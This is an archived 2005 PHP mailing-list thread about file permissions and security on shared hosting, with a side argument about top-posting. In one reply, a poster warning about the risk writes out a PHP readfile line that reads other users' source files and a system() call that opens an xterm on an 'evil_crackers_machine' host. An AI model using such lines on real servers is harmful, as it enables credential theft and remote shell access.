Re: [PHP] Need help with file permissions for PHP files
Two things Rory a. You only replied to me, instead of the list. You have to probably click on reply to all in your mail client. I have included the lists address for this reply, so that it will appear there. Yeah sorry about that mailing you only thing. All the other lists I'm subscribed have the Reply-To field set so that replys are sent to the list automaticly, so I keep forgetting when I reply to this one to 'reply to all'. I'll probably try proxying the php mailing list through my unix server, and set the Reply-To field manually. Any idea how to do that with GMail? 2. Because it reads out of order. Why? Top posting is bad. III. Trimming is good, because it gets right to the point. Top-posting/Bottom-posting matters when the emphasis is on presention. When you're simply trying to get a point across, then its level of importance, drops significantly. Finally I was concentrating on saying what I felt was to be said. I think a free-form, discussion is much better than one where top-posting / bottom-posting, is more important that the actual content of the message. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Need help with file permissions for PHP files
PLEASE lets not start on the. 2. Because it reads out of order. Why? Top posting is bad. III. Trimming is good, because it gets right to the point. .top posting / bottom posting thing again. -Ryan -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.0.308 / Virus Database: 266.9.15 - Release Date: 4/16/2005 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Need help with file permissions for PHP files
Because now it's out of order. On 4/18/05, Ryan A [EMAIL PROTECTED] wrote: PLEASE lets not start on the. Only Joking. 2. Because it reads out of order. Why? Why? Top posting is bad. III. Trimming is good, because it gets right to the point. .top posting / bottom posting thing again. You should have sent that message before Jay sent his to me. -Ryan -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.0.308 / Virus Database: 266.9.15 - Release Date: 4/16/2005 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Need help with file permissions for PHP files
[snip] The problem is that, in order for PHP to be able to access *.php files, the files must in a directory with execute permission, and files themselves must have read permission. This makes my files open to reading by anyone, that is, anyone can look at my PHP source code, which I do not want. The best I can do about it is to put those files in a directory with execute, but without read permission, that way the potential hacker can not know the names of my files, but he may be able to guess them! This is the first and most benign problem, but all following problems are more serious and have the same basis. The website accesses mysql database, and PHP script caches some information into a cache.txt file. Since this PHP script must write to this file, the file has write permission. So, a potential hacher can write to cache file and make my website display errorneus information, or maybe even completely disable website. The third problem is most severe. The PHP scripts from website connect to my mysql database. For security reasons database accepts only connections through local socket file. Again, the permissions are such that, if PHP script can access it, so can potential hacker, and he can also read password from PHP source, so a hacker has no trouble bringing my whole database down (well, he can not do that because of database access privileges, but he could do lot of damage knowing all this). Please help! [/snip] Then you need to go here http://shiflett.org and read about securing your code. If you are worried about being hacked, and from your post it seems that you may be excessively worried (what could you have that a hacker would want that badly?) you need to do lots of reading on securing your server, website, database, etc. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Need help with file permissions for PHP files
Kresimir Cosic wrote: snip Additional information (if that helps): The website is located in directory home/vriho/public_html/ The mysql database is in home/vriho/db/mysql/ (not shared to other users) The local socket file for mysql is at home/vriho/db/socket/ The parts of website that are hidden, including the cache file are at directory home/vriho/public_html/parts/ /snip Just looking at that, if you have to make your files world readable for them to work, your hosting provider doesn't have the box set up properly, and you should think about switching. Basically, Apache should be using suexec to run as the user 'vriho' when serving up pages for your site. All your files/directories should be owner/group 'vriho', and should have no permissions for _other_. -- John C. Nichel ÜberGeek KegWorks.com 716.856.9675 [EMAIL PROTECTED] -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Need help with file permissions for PHP files
[snip]
I think you have to face facts. There is no way you're going to have
your code secure against other users so long as it has to be readable
by apache.
One _PARTIAL_ solution: If like most linux distros, you have a group
called users, which contains every human user on the system, but
doesn't contain the apache user (nobody, apache, www, or something
else, depending on your sys.), you chmod your public_html directory to
701, and set group ownership to 'users'. This results in only you and
system users, being able to access the public_html directory. I
emphasise however that this is only a partial solution, since someone
can write a php script, along the lines of '?php
readfile('/home/otheruser/public_html/file_that_I_want_to_read.php');
?', which will give them access to anything they want to read, that
is readable by apache. I guess you could do something similar with
write permissions and cache.txt
To add insult to injury, if your host allows CGI/Perl, there is a
cgishell script available that presents a virtual shell over CGI, that
would run as the apache user. I've never tried it, but I can't really
see anything stopping something like ?php system('xterm --display
evil_crackers_machine'); ?, or perhaps even something even simpler,
to get an ordinary shell running as the apache user. I guess safe_mode
would help get around some of these problems, but as is written on the
PHP docs, it's the wrong way to solve such a problem(although I'm not
totally sure what the right way is), and it requires admin access.
I guess you could run your own web-server, on a high-numbered port,
and then you can do all the securing you like, but if you aren't the
admin, and the admin doesn't like doing 'extra work' then you're out
of luck. If you are friends with the admin, you could possibly ask him
to install suexec, and run your security-sensitive scripts through
CGI, under your own UID.
[/snip]
Two things Rory
a. You only replied to me, instead of the list. You have to probably
click on reply to all in your mail client. I have included the lists
address for this reply, so that it will appear there.
2. Because it reads out of order.
Why?
Top posting is bad.
III. Trimming is good, because it gets right to the point.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
